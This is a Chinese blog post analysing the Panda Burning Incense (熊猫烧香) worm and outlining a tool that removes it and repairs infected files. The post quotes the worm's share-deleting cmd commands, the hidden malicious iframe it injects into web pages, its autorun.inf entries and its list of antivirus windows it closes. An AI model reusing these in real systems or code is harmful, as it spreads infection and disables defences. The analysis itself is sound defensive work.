ScareCrowL's blog

To maintain world peace

【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写

目录

1.样本概况 3
1.1 样本信息 3
1.2 扫描信息 3
1.3 测试环境及工具 4
1.4 分析目标 4
2.具体行为分析 4
2.1 主要行为 4
2.1.1 恶意程序对用户造成的危害(图) 6
2.2 恶意代码分析 7
2.2.1 病毒主逻辑 7
2.2.2 病毒释放与运行分析 7
2.2.3 病毒感染分析 8
2.2.4 病毒自身保护分析 11
3.解决方案(或总结) 14
3.1 提取病毒的特征,利用杀毒软件查杀 14
3.2查杀修复工具编写步骤及思路 14
3.2.1 查杀思路 14
3.2.2 修复思路 15

(页码为WORD报告页面,不对应本文)

1.样本概况

熊猫烧香是一种经过多次变种的计算机蠕虫病毒,2007年1月初肆虐中国大陆网络,它主要透过网络下载的文件植入计算机系统。

1.1 样本信息

病毒名称:spo0lsv.exe
文件大小:30001 bytes
壳信息:FSG 2.0
MD5值:512301C535C88255C9A252FDF70B7A03
SHA1值:CA3A1070CFF311C0BA40AB60A8FE3266CFEFE870
CRC32:E334747C
病毒行为:
自我复制、感染PE文件、覆写PE文件、修改注册表自启动、枚举进程、结束杀软进程、删除安全软件相关启动项、联网下载等

1.2 扫描信息

https://www.virustotal.com/#/file/40fee2a4be91d9d46cc133328ed41a3bdf9099be5084efbc95c8d0535ecee496/detection
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

1.3 测试环境及工具

OD、IDA、HASH工具、火绒剑、Win7 32位

1.4 分析目标

分析病毒的恶意行为,通过恶意代码梳理感染逻辑,编写查杀修复工具。

2.具体行为分析

2.1 主要行为

病毒的主要行为分三部分:
第一部分(自我复制执行)
第二部分(感染部分)
第三部分(病毒自我保护)
如下图所示(病毒行为与函数调用流程图):
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》
火绒剑行为分析:
1.文件操作:
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

2.注册表操作:
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

3.进程操作
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

4.网络操作
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

5.行为操作
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》
共运行两次cmd命令:
“cmd.exe /c net share C$ /del /y”, 命令行模式下删除C盘的网络共享
“cmd.exe /c net share admin$ /del /y”, 取消的是系统根目录的共享

总结样本恶意行为:
1.自我复制到C:\WINDOWS\system32\drivers\spoclsv.exe并启动
2.在每个目录下创建Desktop_.ini,内容是当前日期
3.在C盘根目录下创建autorn.inf文件,指定自动启动的文件为根目录下的setup.exe(样本)
4.遍历进程、查找窗口,对程序目录下的exe进行感染,图标变为熊猫烧香,打开exe时,自动打开病毒
5.设置注册表键值,设置自启动,并使隐藏文件不显示
6.通过cmd命令禁用C盘网络和系统根目录共享
7.尝试连接局域网中其它机器、向外发包以及访问网页等

2.1.1 恶意程序对用户造成的危害(图)

1.病毒释放自身到驱动目录下并运行:spcolsv.exe
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》
2. 感染文件、禁止任务管理器启动、生成Desktop_.ini文件等
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》
3. 盘符根目录下生成setup.exe与autorun.inf文件
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

2.2 恶意代码分析

2.2.1 病毒主逻辑

比较解密后字符串是否匹配,是则继续执行,不是则退出程序
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

2.2.2 病毒释放与运行分析

《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

2.2.3 病毒感染分析

病毒感染分三种方式:全盘感染(本地)、建立定时器感染(本地)、局域网感染(需要网络)
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

  1. 全盘感染:
    Infect_All (sub_40A5B0)
    • Create_InjectThread(sub_40A48C) 创建感染线程
    • IsHave_Whboy(sub_4041B4) 判断是否含有Whboy字符串
    • Cmp_Name_Suffix (sub_409348)(比较名称和后缀)
    防止对系统运行文件感染,名称中含以下字符串跳过: WINDOWS、WINNT、system32、Documents and Settings、System Volume Information、Recycled、Windows NT、Windows NT、Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、Common Files、ComPlus Applications、Messenger、InstallShield Installation Information、Microsoft Frontpage、Movie Maker、MSN Gamin Zone
    《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》
    感染文件分两类情况:
  2. 第一类:exe、scr、pif、com后缀
    • Inject_Suffix_PE (sub_407F00) 依据后缀判断,为exe等
    • isHaveWhboy,判断PE文件是否含有WhBoy
    《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》
    • CopyFileA,拷贝病毒本体覆盖被感染文件
    《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》
    • CreateRandom(0040576C,创建随机数)
    • Copy_OldPE(尾部拷贝被感染PE ,内部WriteFile->0040308E )
    • Write_NewCode(尾部添加新标识)
    《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》
    感染非常简单,如示例图:
    《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》
    第二类:htm、html、asp、php、jsp、aspx
    • Inject_Suffix_Script(004079CC,网页感染)
    主要将字符串(< iframe src=http://www.krvkr.com/worm.htm width=0 height=0>< /iframe >)添加到文件末尾
  3. 建立定时器感染(本地):
    Infect_Dir->SetTimer(0040BE7C) 通过时钟定时写文件,遍历所有磁盘,并在根目录下复制自身,创建autorn.inf
    • CopyFileA(0040C0E9),释放病毒到各个磁盘根目录如C:\Setup.exe
    《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

• CreateFile (0040C1DE), 创建autorn.inf,写入:

[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

打开磁盘时会自动执行病毒文件(2011年微软对此进行了更新,autorn.inf仅支持CD和DVD媒体)

  1. 局域网感染:
    Infect_Internet (sub_40BACC ) 创建10个线程用于连接局域网(ebx=10)
    《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

    《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》
    判断本机是否连接有效,成功后病毒会尝试攻击目标的139或445端口(攻击端口可以在局域网中访问各种共享文件夹,由于服务器无法连接,只作概略分析)

2.2.4 病毒自身保护分析
主要功能:共创建6个定时器,下载恶意代码、执行cmd命令、删除启动项、关闭服务、打开解密的网页、下载恶意代码等。
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》
• 1.Find_Firewall(0040CEE4)
• CreateFindWallThread(创建遍历窗口线程,回调地址:004061B8)
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

遍历窗口:出现防火墙、进程、网镖、杀毒、毒霸、瑞星、江民、超级兔子、优化大师、木马清道夫、卡巴斯反病毒、木马辅助查找器、Symantec AntiVirus、Duba、esteem procs、System Safety Monitor、Wrapped gift Killer、Winsock Expert、超级巡警 则发送关闭消息
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

• 遍历文件结束各类进程(如任务管理器、注册表等)
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

• 设置病毒Svcshare开机自启动Run、禁止显示隐藏文件
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

• 2. Download_Code (0040D040)->回调地址:0040C9B8->
• DownloadVirus_0(最终回调地址:0040C9B0 )
• URLDownloadToFileA下载恶意代码并执行
• sub_40C5E0 InternetOpenA(QQ) ,InternetOpenUrlA 打开句柄 ,InternetReadFile 下载恶意代码
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

• 3. Download_And_Cmd (0040D048) 下载流程同上,之后运行cmd关闭共享
• CmdExec(回调地址:0040CDEC) 关闭网络共享

《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

• killTimer
• 4.Service_Run_del(回调地址:00406E44)
• 停止、删除指定服务并删除安全软件相关启动项
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

• 5._OpenUrl(0040CC4C)
• sub_40C5E0(类同3.2.2)InternetOpenA(QQ) InternetOpenUrlA(www.163.com等) InternetReadFile
• 6.DownLoad_Code(0040C728)
• sub_40C5E0(类同3.2.2)

3.解决方案

3.1 提取病毒的特征,利用杀毒软件查杀

字符串:Whboy特征(详见修复部分)
网络IP:访问网站(www.163.com)等

3.2 查杀修复工具编写步骤及思路

3.2.1 查杀思路

通过之前总结的病毒行为,有几下几个查杀关键点:
1.关闭“spoOlsv.exe”进程,删除病毒 “C:\WINDOWS\system32\drivers\spoclsv.exe”
删除“HKCU\Software\Microsoft\Windows\CurrentVersion\Run”中创建“svcshare”自启动项、恢复隐藏文件普通设置:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL(病毒将CheckedValue的键值设置为了0)
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

2.删除根目录下的“setup.exe”、 “autorun.inf”以及目录中的“Desktop_.ini”的隐藏文件
代码片段如下:
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

其它行为:如安全类软件在注册表中的启动项、net share命令恢复系统中的共享等因为不知道原始设置不做处理。

3.2.2 修复思路

1.通过PE结构中MZ和PE的标志位判断是否为可执行文件
2.识别病毒文件或感染文件
取文件特征1:
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

  1. 通过尾部特征定位识别程序为感染文件
    取文件特征2:
    《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

定位文件指针:文件大小 – 0xB(.exe.53760) – 文件名长度 – 5
由于随机码可能生成5、6、7位,所以做了三类判断,之后便可以将0x1f000(病毒结束位置)后的二进制流减去尾部特征字符串后恢复文件:(实际测试发现随机码位数可能有问题,时间有限还未逆随机码函数,所以换判断方法)
当前杀软大多会用到静态启发式查杀,即以各类行为或特征的权值计算来判定恶意程序。由于病毒感染较简单,我们就简单的通过两类情况来组合判定:
1.文件和原病毒程序大小比较来判定是否为感染文件(1f000为病毒原始大小)
2.取文件0x815c处特征字符串”WhBoy”组合判断
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

效果演示:
1. 查杀病毒
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

2.病毒修复后:
《【Virus】经典病毒熊猫烧香——分析报告+专杀修复工具编写》

点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注